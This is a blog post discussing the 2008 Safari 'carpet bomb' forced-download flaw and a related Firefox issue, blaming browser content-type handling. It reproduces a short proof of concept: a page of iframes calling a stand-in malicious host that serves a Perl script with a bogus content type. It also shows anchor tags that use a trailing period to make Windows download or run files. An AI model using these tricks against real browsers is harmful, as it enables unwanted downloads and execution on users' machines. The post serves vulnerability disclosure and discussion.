Ok this a re-hash of Nitesh Dhanjani finding in the Apple Safari browser[1]. I read that Billy Rios[2] also found something similar in Firefox. That is very interesting, because I assumed -which is the mother of all fuckups- that Firefox was a bit more strict in checking content-types. Anyway, I read some discussion about it and wanted to give my take on it. I gleamed over the examples provided by Nitesh, and I could not help myself uttering only one sentence: content negotiation. If I am not mistaken, the vulnerability is due to improper content negotiation, because the browser must determine it's content type. If a server gives back a bogus content-type, the browser must check it again before accepting the content-type verbatim, or stream it to the screen. It's the browsers duty to determine what it has to do with the file.
But, there is more to the story. If a server-side language like Perl or PHP has a bogus content-type, the default behavior is to stream it according to many content types as plain-text. This can be attributed again to the browser who initializes a shell to Windows to download -or- execute a file. My first thought was that it should stream it on the screen as plain-text. And that is still the choice of the browser. So long story short: The browser is the culprit, not Windows. I haven't dived deep enough into it, but it's my opinion and it seems obvious to me.
So, what some also don't know about Windows explorer, is how Windows explorer handles file extensions. Here is a good example that I talked about before in the past. If you place a period behind a file extension, Windows explorer tries to download it:
<a href="\WiNdOwS\regedit.exe.">Yo world!</a>
On Windows servers, this can get worse:
<a href="http://SERVER/somefile.php.">Yo world!</a>
Expected behavior? Yes and no, if passed to the Win32 shell without content check, it has no other way than either to prompt to download or execute if it cannot find a proper extension.
Nitesh Dhanjani's Carpet Bomb's:
<HTML>
<iframe id="frame" src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe>
<iframe id="frame" src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe>
<iframe id="frame" src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe>
...
...
...
...
<iframe id="frame" src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe>
</HTML>
Where:
#!/usr/bin/perl
print "Content-type: blah/blah\n\n"
[1]http://www.dhanjani.com/archives/2008/05/safari_carpet_bomb.html
[2]http://xs-sniper.com/blog/2008/06/20/bk-on-safari-hunting-firefox/
